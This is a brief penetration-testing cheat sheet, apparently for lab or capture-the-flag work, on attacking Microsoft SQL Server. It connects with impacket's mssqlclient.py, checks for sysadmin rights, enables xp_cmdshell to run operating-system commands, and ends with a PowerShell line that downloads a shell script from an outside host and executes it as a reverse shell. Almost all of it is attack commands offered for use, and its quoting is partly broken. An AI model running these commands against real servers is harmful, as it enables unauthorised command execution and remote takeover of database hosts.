#
mssql
#
connecting to mssql console
mssqlclinet.py is part of the impacket suite https://github.com/SecureAuthCorp/impacket
python3 mssqlclient.py DOMAIN/sql_svc@10.10.10.27 -windows-auth python3 mssqlclient.py -port 27900 user:password@10.1.1.1
#
Getting Shell
Check to see if user has sysadmin privs
SELECT IS_SRVROLEMEMBER('sysadmin');install shell
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"
#
Setup reverse shell
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.15/shell.ps1\");"